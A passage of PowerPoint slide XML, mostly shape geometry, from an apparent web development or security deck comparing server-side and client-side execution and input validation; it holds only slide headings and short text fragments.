                    <a:pt x="4510024" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132080" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524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0084434" y="3304794"/>
            <a:ext cx="303657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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:endParaRPr sz="22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36876" y="3133344"/>
            <a:ext cx="4651375" cy="832485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4651375" h="832485">
                <a:moveTo>
                  <a:pt x="4512564" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94853" y="7071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56784" y="26761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26761" y="56784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7071" y="94853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="138683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7071" y="737250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26761" y="775319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56784" y="805342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94853" y="825032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138684" y="832103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4512564" y="832103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556394" y="825032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4594463" y="805342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624486" y="775319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644176" y="737250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4651248" y="693419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4651248" y="138683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644176" y="94853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624486" y="56784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4594463" y="26761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556394" y="7071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4512564" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E3B3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283711" y="3354070"/>
            <a:ext cx="29591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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:endParaRPr sz="2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48789" y="1952625"/>
            <a:ext cx="1329880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web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application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designed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perform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code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execution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input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validation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locally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remotely.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86959" y="306451"/>
            <a:ext cx="64820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">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vs.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation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9459" y="760476"/>
            <a:ext cx="9720072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529333" y="3551682"/>
            <a:ext cx="6341745" cy="2369820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6341745" h="2369820">
                <a:moveTo>
                  <a:pt x="0" y="394969"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2656" y="348898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10428" y="304391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23020" y="261743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40136" y="221250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61479" y="183209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86754" y="147915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115665" y="115665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147915" y="86754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183209" y="61479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221250" y="40136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261743" y="23020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304391" y="10428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348898" y="2656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394970" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5946394" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5992465" y="2656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6036972" y="10428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6079620" y="23020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120113" y="40136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158154" y="61479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193448" y="86754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6225698" y="115665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6254609" y="147915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6279884" y="183209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6301227" y="221250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6318343" y="261743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6330935" y="304391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6338707" y="348898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6341364" y="394969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6341364" y="1974850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6338707" y="2020921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6330935" y="2065428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6318343" y="2108076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6301227" y="2148569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6279884" y="2186610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6254609" y="2221904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6225698" y="2254154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193448" y="2283065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158154" y="2308340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120113" y="2329683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6079620" y="2346799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6036972" y="2359391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5992465" y="2367163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5946394" y="2369819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394970" y="2369819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348898" y="2367163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304391" y="2359391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261743" y="2346799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221250" y="2329683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183209" y="2308340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147915" y="2283065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115665" y="2254154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86754" y="2221904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61479" y="2186610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40136" y="2148569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23020" y="2108076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10428" y="2065428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656" y="2020921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1974850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="394969"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="E3B36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73682" y="4301769"/>
            <a:ext cx="5111750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3535">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Code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not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run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7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fu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ly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d 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environment.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349233" y="3601973"/>
            <a:ext cx="6278880" cy="2342515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6278880" h="2342515">
                <a:moveTo>
                  <a:pt x="0" y="390398"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3041" y="341420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11921" y="294260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26273" y="249283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45734" y="206854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69936" y="167339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98515" y="131105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131105" y="98515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167339" y="69936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206854" y="45734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249283" y="26273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294260" y="11921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341420" y="3041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390398" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888482" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937459" y="3041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5984619" y="11921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6029596" y="26273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072025" y="45734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6111540" y="69936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6147774" y="98515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6180364" y="131105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208943" y="167339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6233145" y="206854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6252606" y="249283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6266958" y="294260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6275838" y="341420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6278880" y="390398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6278880" y="1951989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6275838" y="2000967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6266958" y="2048127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6252606" y="2093104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6233145" y="2135533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208943" y="2175048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6180364" y="2211282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6147774" y="2243872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6111540" y="2272451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072025" y="2296653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6029596" y="2316114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5984619" y="2330466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937459" y="2339346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888482" y="2342388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390398" y="2342388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341420" y="2339346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294260" y="2330466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249283" y="2316114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206854" y="2296653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167339" y="2272451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131105" y="2243872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98515" y="2211282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69936" y="2175048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45734" y="2135533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26273" y="2093104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11921" y="2048127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041" y="2000967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1951989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="390398"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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542401" y="4147210"/>
            <a:ext cx="5711190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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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might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require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complex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transactions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for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slowing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down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process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210865" y="3099625"/>
            <a:ext cx="4652010" cy="802005"/>
            <a:chOff x="9210865" y="3099625"/>
            <a:chExt cx="4652010" cy="802005"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9215628" y="3104388"/>
              <a:ext cx="4642485" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4642484" h="792479">
                  <a:moveTo>
                    <a:pt x="4510024" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="132079" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132079" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024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215628" y="3104388"/>
              <a:ext cx="4642485" cy="792480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4642484" h="792479">
                  <a:moveTo>
                    <a:pt x="0" y="132079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6738" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132079" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="6738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="25497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="54095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="90350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4642104" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4635365" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616606" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4588008" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4551753" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4510024" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132079" y="792479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90350" y="785741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54095" y="766982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25497" y="738384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6738" y="702129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="132079"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524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9575038" y="3304794"/>
            <a:ext cx="3926204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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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110" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
            <a:endParaRPr sz="2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36876" y="3133344"/>
            <a:ext cx="4651375" cy="832485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4651375" h="832485">
                <a:moveTo>
                  <a:pt x="4512564" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94853" y="7071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56784" y="26761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26761" y="56784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7071" y="94853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="138683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7071" y="737250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26761" y="775319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56784" y="805342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94853" y="825032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138684" y="832103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4512564" y="832103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556394" y="825032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4594463" y="805342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624486" y="775319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644176" y="737250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4651248" y="693419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4651248" y="138683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644176" y="94853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624486" y="56784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4594463" y="26761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556394" y="7071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4512564" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E3B3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838704" y="3354070"/>
            <a:ext cx="38481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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client-Side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110" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation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653664" y="6675119"/>
            <a:ext cx="11446510" cy="1708150"/>
            <a:chOff x="2653664" y="6675119"/>
            <a:chExt cx="11446510" cy="1708150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2663189" y="6902957"/>
              <a:ext cx="11427460" cy="1470660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11427460" h="1470659">
                  <a:moveTo>
                    <a:pt x="0" y="245110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4979" y="195708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19260" y="149697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41857" y="108061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71786" y="71786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108061" y="41857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149697" y="19260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195708" y="4979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245110" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11181842" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11231243" y="4979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11277254" y="19260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11318890" y="41857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11355165" y="71786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11385094" y="108061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11407691" y="149697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11421972" y="195708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426952" y="245110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426952" y="1225550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11421972" y="1274947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11407691" y="1320957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11385094" y="1362592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11355165" y="1398868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11318890" y="1428798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11277254" y="1451397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11231243" y="1465680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11181842" y="1470660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245110" y="1470660"/>
